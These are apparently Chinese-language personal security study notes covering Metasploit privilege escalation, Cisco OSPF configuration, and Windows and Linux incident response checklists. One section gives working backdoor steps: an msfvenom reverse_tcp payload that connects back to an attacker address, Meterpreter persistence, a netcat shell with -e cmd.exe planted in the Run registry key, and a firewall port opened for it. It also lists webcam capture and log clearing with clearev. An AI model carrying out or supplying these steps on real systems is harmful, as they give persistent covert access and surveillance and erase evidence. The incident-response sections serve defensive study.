目录
一.操作系统权限和密码破解
1.系统权限
Windows:system和administrator或者其他
Linux:root或者其他
CPU:
os(操作系统)
ring0(驱动程序)
ring3(大多数软件)
2.操作系统提权:
ms14_058,ms16_016
目标x32位系统
use exploit/windows/local/ms14_058...
show options
set session 1
exploit
如果使用成功会返回一个新的session号
3.目标信息采集:
需要进入到一个sessions里
run post/windows/gather/forensics/xxxxx // 取证模块
run post/windows/gather/checkvm //检测是否为虚拟机
run post/windows/gather/enum_services //查看运行的服务
run post/windows/gather/enum_applications // 查看电脑安装了哪些应用
run post/windows/gather/enum_shares //查看共享
run post/windows/gather/dumplinks //查看最近操作(安装东西)
run post/windows/gather/enum_patches //查看用户安装了哪些补丁
二.通信常识
1.OSI七层
ISO-OSI七层模型:
物理层:在线路上传播,光电,电磁波等
数据链路层:用以太网交换机进行数据交换, 定义数据如何格式化,进行编址mac地址
网络层:数据传递,路由信息报文(路由器),选择最优路线访问目标(ip地址和路由协议)
传输层:端口之间通信
会话层:主机和主机之间的通信,可以管理结束程序之间的对话
表示层:数据以不同的方式表示出来,可以加密服务或格式化数据等
应用层:各种程序
2.路由器
以Cisco路由器为例子
基础指令:
en //进入特权模式
conf t // 进入全局配置模式
ho R1 //取名R1
优化指令:
no ip domain-lo //不要查询出错的命令
line con 0 //进入console 0调试
no exec-t //不要超时把我弹出
logg syn //命令和弹出的内容换行显示
int [接口] //进入某个接口进行配置
no sh //物理开启接口
ip add [ip地址] [子网掩码] // 配置ip地址
int loo [编号] //环回口(本地测试)
sh ip int bri //查看接口的所有信息
sh run //查看路由器中所有配置
配置三台路由器:
R1
router ospf 1
router-id 1.1.1.1
net 192.168.1.0 0.0.0.255 a 0
net 1.1.1.1 0.0.0.0 a 0
net 13.13.13.0 0.0.0.255 a 0
R2
router os 1
router-id 2.2.2.2
net 2.2.2.2 0.0.0.0 a 0
net 192.168.2.0 0.0.0.255 a 0
net 23.23.23.0 0.0.0.255 a 0
R3(isp)
router os 1
router-id 3.3.3.3
net 3.3.3.3 0.0.0.0 a 0
net 13.13.13.0 0.0.0.255 a 0
net 23.23.23.0 0.0.0.255 a 0
sh ip os nei 查看ospf邻居
三.对后门的简单认识(在kali中)
1. 创建x64木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=【IP地址】 lport=4444 -f exe > msf.exe
run metsvc -A 设定端口上传后门文件,会发现打开了一个新的端口31337
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set lport 31337
set rhost [对方的ip]
exploit
将指令输入可以让对方连接上你
在session中启动
run persistence -A -S -U -i 60 -p 4321 -r [黑客ip] //在对方电脑安装一个永久性的后门,并且每隔60s验证一次是否还存活,使用4321端口
2. msf关闭了,下次重开
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4321
set lhost [自己ip]
exploit
即使sessions -k [id] 过了60s还会回来
3.上传文件也可以安插永久后门(nc):
进入一个session中
upload /root/nc.exe c:\\
查看注册表里有什么
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
把nc放到自动启动里
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\nc.exe -Ldp 444 -e cmd.exe'
查看代码写的对不对
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
查看防火墙状态
netsh firewall show opmode
添加一个防火墙规则允许444端口通过
netsh firewall add portopening TCP 444 "FireWall" ENABLE ALL
目标主机重启之后
nc -v [目标ip] 444
4.其他命令
uictl [enable/disable] [keyboard/mouse/all] 开启/停用键盘/鼠标
webcam_list 查看摄像头
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频
execute 在目标上执行文件
execute -H -i -f cmd.exe 创建新的隐藏可交互的命令cmd.exe
getpid 获取当前进程的pid
ps 查看活跃进程
migrate [pid] 将meterpreter转移到某个pid中
kill [pid] 杀死某个进程
clearev 清除日志,清除windows里的应用程序,系统日志,安全日志
四.windows应急响应
1.一般的攻击方法
web入侵:
挂马,网页篡改(菠菜,黑帽seo),植入webshell,黑页,暗链等
主机入侵:
病毒木马,勒索病毒,远控后门,系统异常,RDP爆破,SSH爆破,主机漏洞,数据库入侵等
网络攻击:
DDOS/CC攻击,ARP攻击,DNS/HTTP劫持
路由器/交换机攻击:
内网病毒,配置错误,机器本身的漏洞
2. windows应急响应:
日志查看:
eventvwr.msc
文件分析:
临时目录排查
tmp/temp
C:\Users\Administrator\Local Settings\Temp
浏览器相关文件
C:\Users\Administrator\Local Settings\History
最近打开的文件||文件修改时间||hosts文件(在C盘Windows\system32\drivers\etc\hosts)
网络行为排查:
重要的辅助站点:
https://www.virustotal.com/
https://x.threatbook.cn/
https://beian.cndns.com/
网络连接排查
metstat -ano
流量分析
wireshark/burpsuite/charles
五.Linux应急响应(kali)
1.攻击后会出现的情况:
cpu飙升
服务器卡顿
异常流量
异常网络连接
服务器无法登录
僵尸网络
挖矿
dns服务器报毒
2.应急措施:
ifconfig
top -c
lsof -i -PnR 查看网络通信情况
ps aux | grep [PID] 查看进程信息
lsof -p [PID] 查看进程打开的文件
md5sum [文件名] 计算文件的md5值,如果被别人修改,md5值会发生变化
3.网络行为分析:
who
查看当前用户的登录信息
uname -a
查看系统信息
netstat -ano
所有网络连接
netstat -utnpl
查看带端口情况的
arp -a
查看arp表
4.进程检查
ps aux
ps -ef
top -c
lsof -p [pid]
lsof -i
lsof -c
5.启动项排查
/etc/init.d/
/etc/xinetd.d
查看rc.local文件
/etc/rc.d/rc[0-6].d
/etc/profile.d/
init文件名,系统启动的第一个脚本
init.d目录名,服务启动脚本
rcX.d目录名,
6.计划任务
/etc/crontab
/var/spool/cron/root
crontab -l
crontab -r
crontab -e
7.服务排查
cat /etc/services
1-1024 系统保留,大多数情况只能由root使用
1024-4999 由客户端程序自由分配
5000-65535 由服务端程序自由分配
服务自启动
chkconfig --level 2345 httpd on
0 = 关机
1 = 单用户
2 = 有网络连接的多用户命令行模式
3 = 无网络连接的多用户命令行模式
4 = 不可用
5 = 带图形界面的多用户模式
6 = 重新启动
chkconfig --list 查看服务自启动状态
--del
8.文件检查
rpm -Va 查看所有软件包的变化情况
/tmp
/etc/init.d
/usr/bin
/usr/sbin
/root
/boot
/bin
/sbin
/etc/passwd
/etc/shadow
ls -alt
按时间排序
find / *.py -perm 4777
ls -al /tmp | grep "Feb 10"
9.帐号检查
w
查看某一时刻用户行为
cat /etc/passwd
cat /etc/shadow
less /etc/passwd
usermod -L [user]
userdel [user]
userdel -r [user]
删除用户之后,/home目录下的用户名文件夹也删了
last 查看成功的登录 /var/log/wtmp
lastb 登录失败情况/var/log/btmp
lastlog 查看上一次用户登录情况 /var/log/lastlog
last -x reboot 查看重启记录
last -x shotdown 查看关机记录
10.历史命令检查
.bash_history
history 查看历史命令
history -c 清空历史命令
cat /etc/hosts
处置命令:
chattr +i [目标文件]
chmod 000 [目标文件]
日志位置:
/var/log/
日志配置文件
/etc/rsyslog.conf